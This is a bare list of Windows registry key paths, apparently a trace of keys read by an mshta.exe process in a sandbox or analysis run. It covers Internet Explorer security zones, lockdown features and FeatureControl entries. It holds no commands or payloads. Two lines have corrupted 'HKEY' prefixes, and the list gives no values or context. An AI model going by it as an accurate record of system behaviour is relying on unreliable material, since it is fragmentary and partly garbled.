HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\System\Setup
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\cmd.exe
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\*
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\cmd.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\*
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONES_DEFAULT_DRIVE_INTRANET_KB941000
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONES_DEFAULT_DRIVE_INTRANET_KB941000
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\cmd.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\*
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1806
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1806
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers\TransparentEnabled
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\Progid
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ShellCompatibility\ProgIDs\exefile
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ddeexec
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\msHta.Exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\msHta.Exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SetWorkingDirectoryFromTarget
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\NoWorkingDirectory
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\AppCompat
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\AppCompat
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\LogIgnoreMonitorReason
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\DEPOff
HKEY_CLASSES_ROOT\clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32
\x1a60\x19fEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Versions\00060101.00060101
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_COMPAT_LOGGING
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ENABLE_COMPAT_LOGGING
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\RtfConverterFlags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Use_DlgBox_Colors
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Anchor Underline
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\CSS_Compat
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Expand Alt Text
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Display Inline Images
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Display Inline Videos
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Display Inline Videos
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Play_Background_Sounds
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Play_Animations
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Print_Background
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Print_Background
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\SmoothScroll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\SmoothScroll
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\XMLHTTP
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Show image placeholders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Show image placeholders
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Disable Script Debugger
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\DisableScriptDebuggerIE
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Disable Diagnostics Mode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Disable Diagnostics Mode
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Move System Caret
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Enable AutoImageResize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Enable AutoImageResize
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\UseHR
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Q300829
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Cleanup HTCs
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\XDomainRequest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\XDomainRequest
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\DOMStorage
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\DOMStorage
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\JScriptProfileCacheEventDelay
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Default_CodePage
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\AutoDetect
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\International\Scripts
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\International\Scripts
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\Default_IEFontSizePrivate
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\International\Scripts
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Settings
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color Visited
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color Hover
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Settings
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Colors
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Font Size
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Font Face
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Disable Visited Hyperlinks
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Use Anchor Hover Color
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\MiscFlags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Styles
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Text Scaling
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Viewport
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Larger Hit Test
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Script
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\AdvancedOptions\DISAMBIGUATION
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Allow Programmatic Cut_Copy_Paste
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup\Print_Background
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Flags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Flags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\CodePage
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\950
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_96DPI_PIXEL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_96DPI_PIXEL
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFontSize
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFontSizePrivate
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEPropFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFixedFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IESerifFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IESansSerifFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEUIFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\AcceptLanguage
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Version Vector
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version Vector\IE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version Vector\VML
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version Vector\WindowsEdition
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONE_ELEVATION
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONE_ELEVATION
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONE_ELEVATION\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONE_ELEVATION\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_NAVIGATION_SOUNDS
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_NAVIGATION_SOUNDS
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\IEDevTools\Options
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\IEDevTools\Options
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IEDevTools\Options
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\IEDevTools\Options
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\MIMEAssociations\text/xml\UserChoice
HKEY_CLASSES_ROOT\MIME\Database\Content Type\text/xml
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\text/xml\CLSID
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SyncMode5
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\SessionStartTimeDefaultDeltaSecs
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSAPIforCrack
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\*
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\RETRY_HEADERONLYPOST_ONCONNECTIONRESET
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\RETRY_HEADERONLYPOST_ONCONNECTIONRESET
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BYPASS_CACHE_FOR_CREDPOLICY_KB936611
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BYPASS_CACHE_FOR_CREDPOLICY_KB936611
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_IGNORE_MAPPINGS_FOR_CREDPOLICY
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_IGNORE_MAPPINGS_FOR_CREDPOLICY
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_INCLUDE_PORT_IN_SPN_KB908209
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_INCLUDE_PORT_IN_SPN_KB908209
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BUFFERBREAKING_818408
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BUFFERBREAKING_818408
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SKIP_POST_RETRY_ON_INTERNETWRITEFILE_KB895954
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SKIP_POST_RETRY_ON_INTERNETWRITEFILE_KB895954
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_FIX_CHUNKED_PROXY_SCRIPT_DOWNLOAD_KB843289
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_FIX_CHUNKED_PROXY_SCRIPT_DOWNLOAD_KB843289
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_CNAME_FOR_SPN_KB911149
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_USE_CNAME_FOR_SPN_KB911149
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PERMIT_CACHE_FOR_AUTHENTICATED_FTP_KB910274
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PERMIT_CACHE_FOR_AUTHENTICATED_FTP_KB910274
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISALLOW_NULL_IN_RESPONSE_HEADERS
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISALLOW_NULL_IN_RESPONSE_HEADERS
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DIGEST_NO_EXTRAS_IN_URI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DIGEST_NO_EXTRAS_IN_URI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ENABLE_PASSPORT_SESSION_STORE_KB948608
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXCLUDE_INVALID_CLIENT_CERT_KB929477
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_EXCLUDE_INVALID_CLIENT_CERT_KB929477
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_UTF8_FOR_BASIC_AUTH_KB967545
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_USE_UTF8_FOR_BASIC_AUTH_KB967545
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RETURN_FAILED_CONNECT_CONTENT_KB942615
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RETURN_FAILED_CONNECT_CONTENT_KB942615
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRESERVE_SPACES_IN_FILENAMES_KB952730
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PRESERVE_SPACES_IN_FILENAMES_KB952730
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\FromCacheTimeout
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
\x6e08\x160EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CertificateRevocation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableKeepAlive
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IdnEnabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PreConnectLimit
